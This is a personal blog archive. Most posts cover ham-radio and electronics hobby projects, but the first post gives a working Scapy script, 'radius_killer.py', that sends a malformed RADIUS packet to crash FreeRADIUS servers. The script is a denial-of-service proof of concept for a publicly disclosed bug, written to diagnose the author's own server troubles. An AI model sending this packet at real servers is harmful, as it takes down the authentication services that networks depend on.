Category Archives: What?!

Freeradius Packet of Death

I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill.

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:

import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius

Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
print “Usage: radius_killer.py <radiushost>\n”
sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \
RadiusAttr(type=69,value=””,len=2)

send(PoD)

(download)

Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.  Correct me if I’m wrong. Either way, updated packages are available.

RIP Milw0rm

APRS using Xastir

A couple months back,  I finally took my Amature Radio Technicians exam. The exam location nearest me gave the exam for free, and with only 35 questions it doesn’t involve copius amounts of studying.

After a friend opened my eyes to a few fun things one can do w/ a radio scanner, I went on a “learning tangent”, reading and talking to people w/ Amature licenses, digesting everything that one can do w/ a radio these days.

One of the things that’s interested me the most is APRS. Using Xastir, one can track mobile and static APRS stations in your area.

Xastir focused on Central Pennsylvania

There’s some interesting stuff out there – in my area there’s a trucker (N6GVG) that I’ve followed, making runs from West Virginia, to Tennesse, to Pennsylvania, and from there to New Jersey. (I’m a HUGE fan of Open Transport Tycoon Deluxe, if you’ve not played it – seriously, get it. I only wish American trains were equiped w/ APRS)

Extremely fun and addictive
The Extremely fun and addictive OTTD

I’d purchased a Yaesu-VX7R from ebay for just under $290.00.

Yaesu-VX7R with a CT-91 cable attached.

With the amature license in tow (KB3TCN), I decided I’d start sending out my own beacons. Problem was, I couldn’t figure out how to interface my soundcard (I’m using soundmodem) with the Yaesu. I’d already purchased the CT-91 cable from ebay (it splits out from a 4 tipped 3.5mm plug to a 3.5mm headphone plug and 2.5mm mic input), but simply connecting the soundcard to the mic input (using an adapter) didn’t work (and was probably incredibly stupid to try). Doing so keeps the radio keyed, and I’m sure is bad.

After talking to the gang on freenode:#hamradio and looking at the manual for TNC connection, it turns out the solution is fairly simple – two interfaces utilizing various isolation transformers (see http://www.qsl.net/wm2u/interface.html for a good intro, I’ll post my modified schematics shortly… I actually wrote this post months ago)

The optimal voltage is 5mV with 2kohms of resistance. My circuit gets it pretty close (btw, I can’t take responsibility for any harm this circuit causes, use at your own discretion. Seriously, don’t trust my judgement – this is how I change a car tire).

Anyway, it’s working for me. I had to pump the soundcard output up pretty high, but I’ve got my beacon reportedly seen by others. (It’s been a few weeks since I’ve transmitted, as my next project is to do a PIC based tracker for my car)

Happy Birthday: The Great Internet Migratory Box Of Electronics Junk

Time flies.

It was one year ago that I first read about the “Great Internet Migratory Box of Electronics Junk”. It piqued my interest then, but I never bothered to put myself onthe list…

Box o Junk
Box o' Junk

Well, I’ve been working more and more on a small handful of projects, and maybe I can find something useful (I’ve also got plenty of decent stuff to rid myself of). So today, my name is on the list… if I get a box, I’ll let you know what I found (with pics).

(If you’re sending a box, just leave me a private comment and I’ll give you contact information)

Adding a discriminator to a BC80XLT Scanner

Adding a discriminator to the Uniden Bearcat BC80xlt scanner isn’t an incredibly difficult task. BC80xlt discriminator

Simply find pin 9 of the MC3361 chip, connect a 2.2nf capacitor connected to a 10k ohm resister w/ a small piece of wire to go to a 3.5mm headphone jack. The capacitor connects to the radio shield, and that’s about it (I suggest you follow the steps above).

My BC80XLT
My BC80XLT

My BC80xlt  is slightly different that in the pictures in the link above. In some way, it’s closer to the BC60-xlt-2. The innards of my device include a main board, connected to a daughterboard.  The “down” side of the daughterboard has the chip, the “top” side has the shield.  This requires one to route the discriminator around the daughterboard, avoiding contact with anything accidentally. My soldering job is pathetic (I have no illusions about that). In my defense I am using a rusty tip which doesn’t conduct very well, but beyond that I really have no excuse aside from not being that skillful. My big concern was damage to the MC3361 by heat from the soldering iron. In fact, later I realized I was using a 30wWatt iron – not the specified 15Watt. (D’oh!) Turning it back on yields no apparent difference, so hopefully all is well.

Yes, I know..
Connection to pin 9
Yes, I know
Connection to the shield

Here’s how the two separate parts of my scanner look:

The top and bottom, which connect together
The top and bottom, which connect together
The connection to the 3.5mm jack
The connection to the 3.5mm jack
The 3.5mm discriminator tap
The 3.5mm discriminator tap

I had to make a few additional modifications. First of all, I removed the former cap and resistor (seen above),  and replaced it with a much better soldered joint (practiced for a bit prior to doing so). The 3.5mm jack has one problem – when pushed in all the way the male connector actually makes contact with the grounded sheild (that’s bad). The shield doesn’t appear to get hot, so I’ve used a small piece of plastic to prevent that from happening. Now everything fits snug, and this works great.